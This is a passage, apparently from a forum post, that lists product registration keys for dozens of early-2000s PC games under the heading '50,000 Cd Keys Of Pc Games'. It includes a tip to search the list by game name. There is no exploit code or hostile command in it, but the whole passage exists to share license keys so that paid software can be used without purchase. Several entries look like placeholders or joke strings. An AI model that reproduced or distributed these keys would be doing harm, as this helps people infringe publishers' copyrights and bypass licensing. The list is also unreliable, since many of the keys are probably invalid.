Inc.[/b]\r\n[b]----------------[/b]\r\n[b]7523-0750352-4120976-1794[/b]\r\n[b]5222-9477431-5422750-3880[/b]\r\n[b]6270-9300423-0980242-3706[/b]\r\n[b]6713-6284510-9024055-7116[/b]\r\n[b]1951-6442621-6463672-6301[/b]\r\n\r\n[b]Throne of Darkness[/b]\r\n[b]----------------[/b]\r\n[b]XUR5-LAB4-XEC3-FuZ6-7287[/b]\r\n[b]XUR9-DEB2-DUC3-NUF2-4483[/b]\r\n[b]RAC2-RAD2-RAC2-RAC2-3387[/b]\r\n[b]NYF9-FEB4-WEN8-PYS3-2228[/b]\r\n[b]LAD8-NAB4-WYB2-CAT2-8667[/b]\r\n\r\n[b]Tien[/b]\r\n[b]----------------[/b]\r\n[b]KSW003-351467-324580-157236[/b]\r\n[b]KSW003-062688-348450-870938[/b]\r\n[b]KSW003-632553-850453-715567[/b]\r\n[b]KSW003-808343-147486-103467[/b]\r\n[b]KSW003-542465-235481-001066[/b]\r\n\r\n[b]Tiger Woods PGA Tour 2002[/b]\r\n[b]----------------[/b]\r\n[b]1740-7476429-1752366-6480[/b]\r\n[b]9263-8148731-8684392-6910[/b]\r\n[b]8213-8231840-4917906-5849[/b]\r\n[b]3040-7691245-7982216-3351[/b]\r\n[b]2266-1247823-3431838-4665[/b]\r\n\r\n[b]Tiger Woods PGA Tour 2003[/b]\r\n[b]----------------[/b]\r\n[b]DUDC-B7SY-XXMX-HFTW[/b]\r\n[b]RNJR-XBTX-8YCY-CZJL[/b]\r\n[b]WPKN-H5DT-FB2A-NTDY[/b]\r\n[b]RD4L-MJED-825R-PP26[/b]\r\n[b]XHCM-YVSN-P6S7-G7JD[/b]\r\n\r\n[b]Tiger Woods PGA Tour 2004[/b]\r\n[b]----------------[/b]\r\n[b]TKGY-8ST4-191R-TFHL-SM4J[/b]\r\n[b]FW5V-EGBM-1191-YZ5L-JPK2[/b]\r\n[b]BB2A-2AVS-119R-PP9Z-KUYJ[/b]\r\n[b]JTQ8-TX0R-911Z-PZ0X-14A2[/b]\r\n[b]E66E-UJUM-R1Z1-HUT0-HVEY[/b]\r\n\r\n[b]Tiger Woods PGA Tour 2005[/b]\r\n[b]----------------[/b]\r\n[b]ZLC4-MALB-DGQP-CHA8-DRLD[/b]\r\n[b]6C99-4VLZ-QPZV-5AU3-WRLD[/b]\r\n[b]UZ66-PCWS-4ELP-7E4E-7RLD[/b]\r\n[b]B9QQ-VGUV-9SBA-UTT5-KRLD[/b]\r\n[b]VXVM-2WDW-PVRM-A9NH-WRLD[/b]\r\n\r\n[b]Tony Hawk\'s UnderGround 2[/b]\r\n[b]----------------[/b]\r\n[b]2FRC-CT3K-2YKK-RKGY-C62B[/b]\r\n[b]AURK-CRKY-T2A5-CGTX-D436[/b]\r\n[b]3CRG-R35K-TK2G-RU35-07F1[/b]\r\n[b]KMY5-M3A8-XU25-22RG-8AC8[/b]\r\n[b]22U8-ABXU-22YK-CX2G-3C37[/b]\r\n\r\n[b]Trainz[/b]\r\n[b]-------[/b]\r\n[b]RAZO-R99F-QPVR-8W4W-XFF8-MC9Z[/b]\r\n[b]RAZO-R9WF-XV5X-EK69-Y8H2-5MI5[/b]\r\n[b]RAZO-R90B-8CMO-Q3LC-3NX8-OHVH[/b]\r\n[b]RAZO-R919-LWEE-AGMQ-5S1T-VXC1[/b]\r\n[b]RAZO-R9K6-FGCH-6B05-6WVH-56YX[/b]\r\n\r\n[b]Tron 2.0[/b]\r\n[b]----------------[/b]\r\n[b]NP3T-C6BR-B4C2-7R36-N996[/b]\r\n[b]5NTC-NCTB-N6BP-28TL-BC7L[/b]\r\n[b]35BC-T6NC-Y678-3YBN-LYNN[/b]\r\n[b]6B6Y-YT48-PPT9-NL6P-6P5P[/b]\r\n[b]7LBB-TR58-8393-RNB7-T8N7[/b]\r\n\r\n[b]Triple Play Baseball[/b]\r\n[b]----------------[/b]\r\n[b]8460-8035283-2715299-7813[/b]\r\n[b]1683-4291440-2555051-0089[/b]\r\n[b]5066-4548454-6755449-4360[/b]\r\n[b]6104-0082423-4715400-2449[/b]\r\n[b]9453-1015799-4202831-2666[/b]\r\n\r\n[b]UEFA Euro 2004[/b]\r\n[b]----------------[/b]\r\n[b]U899-HZ4V-2S7E-8Y5N-P93Q[/b]\r\n[b]VMLC-9GFL-73JE-SK4W-SSL8[/b]\r\n[b]NY22-RF29-CH6C-9SZ7-NL6V[/b]\r\n[b]YSP7-CGCB-SEF5-U4EF-52RU[/b]\r\n[b]CWBB-CV6X-824W-GW3R-R2RA[/b]\r\n\r\n[b]Unreal Tournament 2003[/b]\r\n[b]----------------[/b]\r\n[b]EPPPW-KTH8G-BANDU-N397J[/b]\r\n[b]EKBD7-BNG9Y-BBDE9-PGER2[/b]\r\n[b]FEDFY-LVPEL-AYWNE-MU978[/b]\r\n[b]G6E83-YB7AF-BER9D-TQEBK[/b]\r\n[b]XHGLB-VLMLA-BBHM6-CVZTX[/b]\r\n\r\n[b]Unreal Tournament 2004[/b]\r\n[b]----------------[/b]\r\n[b]WMDYD-WJH2Z-AP7KG-ADB3T[/b]\r\n[b]UPE4C-3G97W-AGK2X-7ZB83[/b]\r\n[b]F36DV-DKNH7-ACK2K-2Z78T[/b]\r\n[b]2CY2T-XCMH8-ABPQL-L2QDH[/b]\r\n[b]XM4EL-DGB27-AGPNH-748UB[/b]\r\n\r\n[b]Virtual Railroad 3[/b]\r\n[b]----------------[/b]\r\n[b]22F9-E1SA-2KW6-H5T4[/b]\r\n[b]2H2P-2MRG-IH9K-MMFH[/b]\r\n[b]2GU9-A2HB-2ED3-53GE[/b]\r\n[b]A3K9-A4N7-28D1-G1R7[/b]\r\n[b]EFK1-IBM3-A5LC-E8H1[/b]\r\n\r\n[b]Warcraft 3[/b]\r\n[b]----------------[/b]\r\n[b]N9UBI4-GRQS-TDV29O-QF8H-7SMKLM[/b]\r\n[b]1YREOT-636V-59GAGA-8SYH-7FBJ43[/b]\r\n[b]JAXDO1-2Z6F-G7NZTI-H0QK-BE543P[/b]\r\n[b]CFMOSV-X0WD-U17ITP-RVPR-UTX4YP[/b]\r\n[b]QA1GX3-2UBS-6BM34T-Z7NO-P0H2W5[/b]\r\n\r\n[b]Warcraft 3: The Frozen Throne[/b]\r\n[b]----------------[/b]\r\n[b]WGMNX2-EGT7-8KD9EV-H6ZR-ZPH7PZ[/b]\r\n[b]B47XWP-VTNP-HHXZZF-DJ4B-MMFGPX[/b]\r\n[b]ZP944Z-8W4D-FJ4YCR-GGYV-2F6DHE[/b]\r\n[b]8NBFN2-KZHW-CXGJTM-2CJ4-FH4GWB[/b]\r\n[b]ETHTR9-FM7Z-DN84YW-F2JB-2DHMVY[/b]\r\n\r\n[b]Warhammer 40k: Dawn of War[/b]\r\n[b]----------------[/b]\r\n[b]4806-2A50-6E56-F843[/b]\r\n[b]0D20-4518-FDE6-0748[/b]\r\n[b]04C2-33AA-5DDB-5B2A[/b]\r\n[b]7EAC-26E7-50FA-AA21[/b]\r\n[b]CCFE-401F-BFD0-7287[/b]\r\n\r\n[b]ZanZarah: The Hidden Portal[/b]\r\n[b]----------------[/b]\r\n[b]1LPL-9F81-LINR-60NU-XDXE[/b]\r\n[b]1F57-7JJ3-UHN3-P0PA-ZXED[/b]\r\n[b]18NB-1SEG-1INU-CETJ-2SOT[/b]\r\n[b]1PLD-8D4M-N9B7-8T9E-WTMF[/b]\r\n[b]1ZK4-ONEM-XNH8-PISY-WL6V[/b]\r\n\r\n[b]Harry Potter And The Prisoner Of Azkaban:[/b]\r\n[b]GLYQ-AYYW-6CST-VXDK-3DEV[/b]\r\n[b]9RLL-Q5TF-BS3J-34AG-RDEV[/b]\r\n[b]RPKB-2N57-RDGU-8CW5-9DEV[/b]\r\n[b]HUSA-YX5T-6AG4-BL3E-6DEV[/b]\r\n[b]RAP7-U5JQ-94N3-DGY5-RDEV[/b]\r\n[b]------------[/b]\r\n[b]FIFA/UEFA Euro 2004:[/b]\r\n[b]V8G8-2LF8-CJKD-M6C3-CDEV[/b]\r\n[b]E7MD-QS48-VDGQ-E76C-PDEV[/b]\r\n[b]MS2A-EB3K-ZMDW-VYX5-XDEV[/b]\r\n[b]ZWTB-KD3U-HSVF-6BGA-ZDEV[/b]\r\n[b]3CC4-GFBC-RBS5-C2S7-ZDEV[/b]\r\n[b]3GWW-29QP-CY3W-FS3Q-FDEV[/b]\r\n[b]8BEN-9HYW-4YZ3-Z468-ZDEV[/b]\r\n[b]DHKT-7Y2D-VDLM-35G8-PDEV[/b]\r\n[b]5CWE-Y94G-2A48-S388-6DEV[/b]\r\n[b]UNYG-4EUL-X7WK-HNHE-LDEV[/b]\r\n[b]------------[/b]\r\n[b]Painkiller:[/b]\r\n[b]4748-0c40-6813-15f0[/b]\r\n[b]f95d-5105-fa92-a706[/b]\r\n[b]68df-9010-33d4-6e82[/b]\r\n[b]------------[/b]\r\n[b]Dead Mans Hand:[/b]\r\n[b]DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K[/b]\r\n[b]DEVT-8YKJ-CGFE-H5H5-QD43-PX2X[/b]\r\n[b]DEVV-XUEA-CM78-YUNP-56JL-NFDS[/b]\r\n[b]DEVD-NRRN-LS4Y-RTXT-XMCT-QVQR[/b]\r\n[b]DEVR-QTBF-GAW4-S5X5-TZPD-W7EJ[/b]\r\n[b]DEVF-27TY-A5L3-VUX2-MWDM-PVSK[/b]\r\n[b]------------[/b]\r\n[b]Unreal Tournament 2004:[/b]\r\n[b]GTXF9-XJPT6-APK6W-DDMPM[/b]\r\n[b]AJLYX-F9QEA-AJV2Z-AM82B[/b]\r\n[b]PW3NB-399WG-ABLYN-DLDLE[/b]\r\n\r\n[b]BattleField: Vietnam:[/b]\r\n[b]V2W6-54VJ-9R11-XJPU-79CM[/b]\r\n[b]935V-BL3H-1ZRR-PESW-9HGK[/b]\r\n[b]NQFX-XSBQ-R1R9-VW47-G2VW[/b]\r\n[b]YMAJ-7X2T-991R-5G8C-6RJC[/b]\r\n[b]6Q7X-VP1T-1R1Z-VZX0-NP2N[/b]\r\n[b]CESA-VN0G-1RR1-K8VS-G6M3[/b]\r\n[b]EZ2J-BVU9-11R1-87PN-CDAL[/b]\r\n[b]EYKB-ADLR-19R9-V04D-C5H6[/b]\r\n[b]2VQY-EFVZ-1119-907X-EU18[/b]\r\n[b]7ZB3-FQYK-9111-6CS7-0060[/b]\r\n[b]------------[/b]\r\n[b]Delta Force: Black Hawk Down Team Sabre[/b]\r\n[b]S8VS-RKRH-8J9J-9G6N-5S7S[/b]\r\n[b]AJWN-CE28-4H8N-92G8-CHEQ[/b]\r\n[b]SURN-JDCN-BWKR-5ENK-9TH4[/b]\r\n[b]SD9C-5EUZ-FV38-C88U-7Y9C[/b]\r\n[b]A4NV-Y362-AFLR-ZKKB-C288[/b]\r\n[b]SPNK-6JZZ-DRM3-Q9S5-8MXH[/b]\r\n[b]------------[/b]\r\n[b]Dominions II: The Ascension Wars[/b]\r\n[b]2531-8943-1111-690[/b]\r\n[b]------------[/b]\r\n[b]SpellForce: the Order of Dawn[/b]\r\n[b]08AFX-CGGML-W260D-5RRPO-CVNFD[/b]\r\n[b]------------[/b]\r\n[b]Neverwinter Nights: Hordes of the Underdark[/b]\r\n[b]BBWLB-FOQLC-3HB2L-UKRNM-Q9YXG-N842W-0Y7V3[/b]\r\n[b]------------[/b]\r\n[b]Total Club Manager 2004:[/b]\r\n[b]WR5M-3RJD-ECWN-YYWY-QDEV[/b]\r\n[b]C933-S2AA-SQJG-6GS6-2DEV[/b]\r\n[b]GPZH-BGEW-3QA5-RES2-GDEV[/b]\r\n[b]9X6W-JD8T-ZB6K-NPK3-FDEV[/b]\r\n[b]RPMD-YZFF-BWJF-DW5K-BDEV[/b]\r\n[b]------------[/b]\r\n[b]Terminator 3: War of the Machines[/b]\r\n[b]DEVS-FJKY-SR5J-AN7Z[/b]\r\n[b]DEV2-SSE8-8DWT-5NBZ[/b]\r\n[b]DEVV-STUQ-S6PL-Y49P[/b]\r\n[b]DEVG-M8SF-YH2J-7ABZ[/b]\r\n[b]DEV4-3WJR-D3VF-84BJ[/b]\r\n[b]DEV6-VPT8-YDL6-8CN7[/b]\r\n\r\n[b]NBA Live 2004 Cdkey[/b]\r\n[b]GBNE-CF84-BSAM-28QV-UDEV[/b]\r\n[b]NWCC-JQGF-WS64-XQCQ-NDEV[/b]\r\n[b]C3WE-HQL4-4AX5-MUSE-CDEV[/b]\r\n[b]------------[/b]\r\n[b]Magic The Gathering: Battlegrounds[/b]\r\n[b]8DEV-NG6A-3B26-2EKL-LJWY-LNNB[/b]\r\n[b]------------[/b]\r\n[b]No One Lives Forever 2: Contract JACKASS[/b]\r\n[b]XYR9-FEB6-CYP5-NUG3-7248[/b]\r\n[b]------------[/b]\r\n[b]Lord of the Rings: War of the Ring[/b]\r\n[b]XUF5-JUB2-JAB8-JUD3-4947[/b]\r\n[b]------------[/b]\r\n[b]CALL OF DUTY:[/b]\r\n[b]T3W8-343X-T82W-T3T3-BAD2[/b]\r\n[b]3TX4-4X8H-UP2E-P834-FF82[/b]\r\n[b]43DK-8S2Y-3UTU-U348-7CEC[/b]\r\n[b]8H2T-SUD2-HD4D-WE8S-1EDB[/b]\r\n[b]KWYE-X8DD-SHKT-2GKX-E544[/b]\r\n[b]------------[/b]\r\n[b]FIFA 2004:[/b]\r\n[b]7U44-FACX-443H-ANE4-LDEV[/b]\r\n[b]JF8Y-Z9Y2-8S46-A44N-NDEV[/b]\r\n[b]6KSS-KREK-L66J-BGN4-8DEV[/b]\r\n[b]U2ZH-5BSQ-W4QY-6QYN-4DEV[/b]\r\n[b]S8YY-7RA6-WCW4-5JJS-CDEV[/b]\r\n[b]SCE6-8EY2-WNUG-7888-2DEV[/b]\r\n[b]GJEE-JPSA-AEC6-WY6C-4DEV[/b]\r\n[b]AFUC-2Z9U-HN6P-RPD6-ADEV[/b]\r\n[b]VBKT-RNKF-4L4F-QE4N-7DEV[/b]\r\n[b]U4EE-NP2P-TAKP-S9AT-6DEV[/b]\r\n[b]------------[/b]\r\n[b]Harry Potter: Quidditch World Cup[/b]\r\n[b]3FJA-LVDF-DAJP-34HR-RDEV[/b]\r\n[b]MSEE-5EL4-WYBB-DGLU-GDEV[/b]\r\n[b]6Q7F-WAAC-8QTH-WLC4-EDEV[/b]\r\n[b]Q3N6-2X4N-A4EA-NY64-GDEV[/b]\r\n[b]GJGQ-4SLL-EA4Y-FJSU-UDEV[/b]\r\n[b]5LM5-M22H-45YT-W88Z-2DEV[/b]\r\n[b]C6U4-7A49-4CE2-MUGL-8DEV[/b]\r\n[b]BH4U-GCNX-WMJ8-ZGKY-4DEV[/b]\r\n[b]KAU4-AVFV-34AK-782Y-4DEV[/b]\r\n[b]Y3QQ-TUGW-4NU4-ZG68-6DEV[/b]\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n[b][/b][/b]\r\n\r\n[b]Empires: Dawn of the Modern World[/b]\r\n[b]XG4H-A893-TZ9W-98A4-B063[/b]\r\n[b]CT4G-TJP3-4XAT-N4TK- 52E[/b]\r\n[b]CNTK-HK39-A3GN-KGZG-AB2C[/b]\r\n[b]------------[/b]\r\n[b]Hidden and Dangerous 2:[/b]\r\n[b]1234-5678-9abc-dddf[/b]\r\n[b]------------[/b]\r\n[b]Halo: Combat Evolved[/b]\r\n[b]CHKGP-K4KWV-FQQ9G-XHVHM-RVMD8[/b]\r\n[b]------------[/b]\r\n[b]Judge Dredd: Dredd Vs. Death[/b]\r\n[b]NUN6-GAB2-TAX7-ZYG6-3537[/b]\r\n[b]------------[/b]\r\n[b]The Sims: Makin Magic[/b]\r\n[b]BESA-WVUM-5C95-JNXY-VDEV[/b]\r\n[b]VSHR-ZLGZ-HXWP-EBVZ-KDEV[/b]\r\n[b]ETKB-D748-8W4J-D2A4-ADEV[/b]\r\n[b]JC3T-5Z4V-G4GG-5U8U-6DEV[/b]\r\n[b]J8YG-9B7H-7FLT-BNDX-9DEV[/b]\r\n[b]CQPX-X9EZ-SWNC-7GLN-CDEV[/b]\r\n[b]EW3B-ZUSF-8CYJ-4EEN-2DEV[/b]\r\n[b]QAPX-CH4R-NYQS-YS4Y-UDEV[/b]\r\n[b]AWRR-GRZ3-A3LV-RD8H-TDEV[/b]\r\n[b]TQKK-Y29X-4Z64-T3P2-CDEV[/b]\r\n[b]------------[/b]\r\n[b]Once Upon A Knight:[/b]\r\n[b]RBHE-9ZBU-U7AU-QMUV[/b]\r\n[b]------------[/b]\r\n[b]Freedom Fighters:[/b]\r\n[b]PQGY-4FAQ-TMQ5-Q4X8-KXCS[/b]\r\n[b]P4QQ-T5AQ-T6SD-F5F7-R79V[/b]\r\n[b]PZ3K-4NAQ-TPZT-Z6WU-ZD2W[/b]\r\n[b]PZ3K-4NAQ-TPZT-Z6WU-ZD2W[/b]\r\n[b]PW6W-3LAA-TMSA-NBBP-YHCV[/b]\r\n[b]P866-C4AX-THLC-LGNB-2LWN[/b]\r\n[b]PGC4-SWA7-T7XN-BU6Y-A6BW[/b]\r\n[b]------------[/b]\r\n[b]Tiger Woods PGA Tour 2004:[/b]\r\n[b]YPZ9-QPT5-5TJL-ASLA-EDUM[/b]\r\n[b]QYRH-7YJG-T2LR-DRN2-WSER[/b]\r\n[b]JN6E-RUEU-Y5A9-2YCS-NNYB[/b]\r\n[b]F4BT-KZ33-DTDW-WABH-74AK[/b]\r\n[b]A9JA-ND2S-4SGQ-TS44-A4CJ[/b]\r\n[b]W7JS-UPQ2-NRJA-DH58-QJ4H[/b]\r\n[b]WFFF-QES4-YUJL-PNGE-42WQ[/b]\r\n[b]S2R9-JUYM-WGC8-7EWW-YYAE[/b]\r\n[b]4VJ2-KGWG-UASC-ZYC2-8N8E[/b]\r\n[b]S9JJ-CUZK-SCD6-TCN6-Z4EV[/b]\r\n\r\n[b]Medal of Honor: Allied Assault Breakthrough[/b]\r\n[b]L5KB-32WY-B6G5-6747-YQ49[/b]\r\n[b]ADL4-HFJD-E38B-5AYG-8WLV[/b]\r\n[b]93LL-HUB4-XKFC-EGXT-2LG5[/b]\r\n[b]UM6W-H75N-67D6-PG8H-THGJ[/b]\r\n[b]CN99-A94W-Q2JG-4K3Q-44EK[/b]\r\n[b]52MV-ZYNC-8RM3-L5M5-2YWG[/b]\r\n[b]42RH-PNLU-J2R2-TDA9-K4Z2[/b]\r\n[b]BY7X-ZA8G-7TE2-GDT4-3J39[/b]\r\n[b]WWDD-K4T5-SLF2-DLN2-D4AK[/b]\r\n[b]WDBT-NTLK-DEBT-N44R-LU8C[/b]\r\n[b]------------[/b]\r\n[b]NHL 2004:[/b]\r\n[b]6T22-8L62-6666-8666-6666[/b]\r\n[b]FQ22-BXTP-FLT!-ELT!-FLT![/b]\r\n[b]CHYQ-AVKH-CRKD-GRKD-CRKD[/b]\r\n[b]BZ8G-WCOL-L8JD-SUXM-LTBV[/b]\r\n[b]A75V-8YSW-JQ75-NE79-LC4W[/b]\r\n[b]ZZGY-JQVB-PJ4T-6K6K-4INY[/b]\r\n[b]B233-BN2E-BUL3-87C5-4YZA[/b]\r\n[b]AWZH-HVNV-P8FK-XHPQ-8EUJ[/b]\r\n[b]J4LL-PZID-QZEM-RPQ2-UHRF[/b]\r\n[b]RKRR-R3C4-QWP8-QUXI-96KC[/b]\r\n[b]------------[/b]\r\n[b]Sim City 4: Rush Hour[/b]\r\n[b]CLC4-5ZU8-6C4S-9W46-LS4E[/b]\r\n[b]8KN6-M5WS-PSWT-WDSF-4J4H[/b]\r\n[b]UV8Y-U7CE-G6W2-44CN-S8JG[/b]\r\n[b]ZPXP-ZPTX-7THC-6C5M-54C3[/b]\r\n[b]L44L-M3NU-4EUS-6866-S62G[/b]\r\n[b]2ZZR-MP29-2222-H222-2222[/b]\r\n[b]CFWN-LZJE-46WA-JQG2-SUCC[/b]\r\n[b]63A2-WT4M-G2Z5-XR8Z-9SF4[/b]\r\n[b]M5R9-MLYC-VFQD-2MMC-KGK2[/b]\r\n[b]NMMD-QET5-WADQ-SA48-KW4P[/b]\r\n\r\n[b]Command and Conquer Generals: Zero Hour Expansion[/b]\r\n[b]ULPF-ZEVK-FRWG-Q4YJ-6F2T[/b]\r\n[b]Y83K-CT4F-VL2X-4X4M-SW8X[/b]\r\n[b]2LMD-5MUD-UY2Y-SUU2-2UUQ[/b]\r\n[b]WVNN-XDK3-PZ6Q-PN42-W9G7[/b]\r\n[b]YM2S-PVC6-RL2T-UT89-SW8T[/b]\r\n[b]4EFF-YZNG-6AS4-3QJQ-44YG[/b]\r\n[b]QFYY-CEQT-J4G8-3UWQ-48UY[/b]\r\n[b]N3XF-MGW6-GLEE-8S2A-YASU[/b]\r\n[b]AZNE-P748-W8C4-SSWS-4E8S[/b]\r\n[b]87Z9-U64J-Y84U-QA6W-82NJ[/b]\r\n[b]QJ9H-W286-YVKX-VX6Z-KN7C[/b]\r\n[b]4BFF-9YWF-Q6SG-TLGU-CNC2[/b]\r\n[b]YHJS-GVKT-4U9Y-DUW4-5622[/b]\r\n[b]EL22-2W4Z-P45K-JUL7-CQYW[/b]\r\n[b]UN7P-G6SA-YAG4-4YL4-SG2W[/b]\r\n[b]------------[/b]\r\n[b]Rugby 2004:[/b]\r\n[b]PU2S-DTA3-TLMH-47CP-5PQH[/b]\r\n[b]PXMM-YCAW-TGKZ-4F75-HL6V[/b]\r\n[b]PWK3-GDA4-TXCB-VB8P-KCQB[/b]\r\n[b]P74L-JWA3-THBH-JVRE-VF5Z[/b]\r\n[b]PW7F-AYAG-TGF7-3J7V-NSXB[/b]\r\n[b]PD5V-Z5AW-TRXK-7U2H-DQHR[/b]\r\n[b]------------[/b]\r\n[b]Homeworld 2:[/b]\r\n[b]NAS3-DEC2-BYJ5-CUJ6-8385[/b]\r\n[b]------------[/b]\r\n[b]Nascar Thunder 2004 :[/b]\r\n[b]CLZH-PE48-R9RR-G9ZT-9DSW[/b]\r\n[b]1RKB-TB12-ZZ9R-ZLAU-0U0A[/b]\r\n[b]QKLL-JEIB-R119-3L4D-IIK3[/b]\r\n[b]ZXC4-YRZ9-1O1A-N8DU-RQ90[/b]\r\n[b]E7RR-PV4D-1ZR1-X5IL-ZFAW[/b]\r\n[b]MBE6-5JLH-9A11-2TSV-17WD[/b]\r\n[b]1BTT-R7CR-RA1R-SIWJ-Z592[/b]\r\n[b]H68G-8SGZ-1RZ9-Q8AN-NZ2R[/b]\r\n[b]------------[/b]\r\n[b]Battlefield 1942: Secret Weapons of WWII[/b]\r\n[b]2gyy-3wlk-8btf-wjur-g277[/b]\r\n[b]------------[/b]\r\n[b]Tron 2.0[/b]\r\n[b]9393-L9CN-PRTB-T7N4-5858[/b]\r\n[b]------------[/b]\r\n[b]Tony Hawk Pro Skater 4:[/b]\r\n[b]P4EPBTIQDAIH7WXM[/b]\r\n[b]------------[/b]\r\n[b]Madden NFL 2004:[/b]\r\n[b]VMZ9-JXRC-AZOR-J000-1911[/b]\r\n[b]0266-FF0M-6666-M666-6666[/b]\r\n[b]GW7P-A96J-4665-6454-6767[/b]\r\n[b]624L-CYGB-F46D-MG45-D6G4[/b]\r\n[b]------------[/b]\r\n[b]Hoyle Majestic Chess:[/b]\r\n[b]XYN6-NAB4-FES2-MUX7-3485[/b]\r\n[b]------------[/b]\r\n[b]Chaser:[/b]\r\n[b]52QJY-10K8V-CLNPI-1EISW-7VNP3[/b]\r\n[b]------------[/b]\r\n[b]F1 Challenge 99-02:[/b]\r\n[b]5093-3562421-9149309-1230[/b]\r\n[b]9001-8194913-5555300-6649[/b]\r\n[b]5696-3920619-9004669-1043[/b]\r\n[b]3039-9020019-1951603-0151[/b]\r\n[b]7598-0895367-4117659-0320[/b]\r\n[b]------------[/b]\r\n[b]Star Trek: Voyager Elite Force II[/b]\r\n[b]DEVI-ANCE-ISHE-RE!!-FFDE[/b]\r\n[b]Q6NJ-GS1Q-M5VE-5YXR-97BD[/b]\r\n[b]R9TI-4HHN-1MEF-LAIV-CDEB[/b]\r\n[b]W4JZ-W1R5-5KK3-IRS2-DCE7[/b]\r\n[b]M2QB-8UK5-HCGA-8UGL-0E2C[/b]\r\n[b]6RXS-GBSY-BJYG-99WR-A7A3[/b]\r\n[b]YD7X-YT2P-GFHC-CFST-6623[/b]\r\n[b]5ZTT-8GVX-LPJA-DBX2-7F68[/b]\r\n[b]QGHR-I2XS-R4B9-94XB-A562[/b]\r\n[b]IOWB-MVPW-9KH7-5YZA-E99A[/b]\r\n[b]------------[/b]\r\n[b]Warcraft III: Frozen Throne[/b]\r\n[b]VNM6K8-D24F-DV7JJJ-2DVM-9X9D9M[/b]\r\n[b]JN9YDG-WY7Z-XGEK4C-N6WB-CEGDG9[/b]\r\n[b]HH84GY-2CPR-EYB8MM-6VYV-C2P8P8[/b]\r\n[b]YF74K9-HZ2N-ZXK6CN-JCRV-9E6467[/b]\r\n[b]T4CH2G-E6BF-Y7WZ7Z-6BPK-PRM2MC[/b]\r\n[b]------------[/b]\r\n[b]Spy Hunter:[/b]\r\n[b]SHU3E7RVCCRBFHSS[/b]\r\n[b]------------[/b]\r\n[b]Tien:[/b]\r\n[b]KSW003-234403-373342-364267[/b]\r\n[b]KSW003-808343-147486-103467[/b]\r\n[b]KSW003-351467-324580-157236[/b]\r\n[b]KSW003-181748-350468-760972[/b]\r\n[b]KSW003-810607-663324-308548[/b]\r\n[b]KSW003-062688-348450-870938[/b]\r\n[b]KSW003-163206-615444-877087[/b]\r\n[b]KSW003-686451-784502-614557[/b]\r\n[b]KSW003-542465-235481-001066[/b]\r\n[b]KSW003-632553-850453-715567[/b]\r\n[b]------------[/b]\r\n[b]1503 A.D. The New World:[/b]\r\n[b]0705-7933859-6725970-0015[/b]\r\n[b]4674-0728030-1210467-5142[/b]\r\n[b]0163-3628552-7474216-1618[/b]\r\n[b]9543-9977522-5363454-0014[/b]\r\n[b]2484-9264724-5725148-0845[/b]\r\n\r\n[b]MVP Baseball 2003:[/b]\r\n[b]CQ7C80574479*94F[/b]\r\n[b]CQ7C85215498*945[/b]\r\n[b]CQ7C80055454*935[/b]\r\n[b]CQ7C85785435*9C6[/b]\r\n[b]CQ7C80526433*953[/b]\r\n[b]CQ7C85266435*939[/b]\r\n[b]CQ7C86096418*9DA[/b]\r\n[b]CQ7C81827437*9D6[/b]\r\n[b]CQ7C86567439*93C[/b]\r\n[b]CQ7C81308473*94D[/b]\r\n[b]CQ7C86048471*94B[/b]\r\n[b]CQ7C85678431*92F[/b]\r\n[b]CQ7C80419450*93D[/b]\r\n[b]CQ7C85159494*935[/b]\r\n[b]------------[/b]\r\n[b]Galactic Civilizations:[/b]\r\n[b]DN-500792-GC1-CLS4FLT8XT[/b]\r\n[b]------------[/b]\r\n[b]Delta Force: Black Hawk Down:[/b]\r\n[b]QZP3-EPZW-SP5N-2XEX-H7JG[/b]\r\n[b]------------[/b]\r\n[b]Deep Sjeng:[/b]\r\n[b]BFAE79BD-AA205929-6B70F982-9F4CE0F1[/b]\r\n[b]------------[/b]\r\n[b]IGI-2: Covert Strike[/b]\r\n[b]031f-f8d0-6536-b510[/b]\r\n[b]1320-615d-ba73-52ec[/b]\r\n[b]------------[/b]\r\n[b]Nascar Racing Season 2003:[/b]\r\n[b]RAB2-RAB2-RAB2-RAB2-8869[/b]\r\n\r\n[b]Command and Conquer Generals:[/b]\r\n[b]4963-7882913-5984076-0674[/b]\r\n[b]5412-0014607-1777733-1746[/b]\r\n[b]3496-5109968-3484992-5863[/b]\r\n[b]5533-3743808-8068198-3235[/b]\r\n[b]9722-8289078-1586124-6505[/b]\r\n[b]2586-2653924-6182119-3319[/b]\r\n[b]7629-5200391-8195325-2636[/b]\r\n[b]2586-7722941-9698255-2218[/b]\r\n[b]4912-5083939-6799769-5962[/b]\r\n[b]------------[/b]\r\n[b]Sim City 4:[/b]\r\n[b]NCM4-RHYX-6QMX-DX4M[/b]\r\n[b]------------[/b]\r\n[b]James Bond 007: NightFire:[/b]\r\n[b]1740-9488245-5171152-5578[/b]\r\n[b]7614-2322168-5761892-1232[/b]\r\n[b]7954-3123341-1387427-6504[/b]\r\n[b]------------[/b]\r\n[b]Hegemonia: Legions of Iron[/b]\r\n[b]BAD0-DAD0-5000-8113[/b]\r\n[b]BAD9-DAD9-5001-A112[/b]\r\n[b]BAD8-DAD8-5002-8112[/b]\r\n[b]BAD7-DAD7-5003-6113[/b]\r\n[b]DEAD-1870-5004-4538[/b]\r\n[b]DEAD-1871-5005-7538[/b]\r\n[b]DEAD-1872-5006-6538[/b]\r\n[b]DEAD-1873-5007-953B[/b]\r\n[b]------------[/b]\r\n[b]Medal of Honor: Spearhead[/b]\r\n[b]5000-0000000-0000000-5039[/b]\r\n[b]------------[/b]\r\n[b]NBA Live 2003:[/b]\r\n[b]Q2EP-95B3-55E3-KKWZ[/b]\r\n[b]QJFX-YPCL-G2FL-249Q[/b]\r\n[b]G84A-YSUU-264U-BFHE[/b]\r\n\r\n[b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b]\r\n\r\n[b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b]\r\n\r\n\r\n\r\n\r\n[b]50,000 Cd Keys Of Pc Games[/b]\r\n[b][/b][/b]\r\n\r\n[b]O.R.B. :[/b]\r\n[b]JTRV74NVVKUJX7AM[/b]\r\n[b]------------[/b]\r\n[b]Star Trek: Starfleet Command III[/b]\r\n[b]0000-0000-0000-K28K[/b]\r\n[b]------------[/b]\r\n[b]Harry Potter: Chamber of 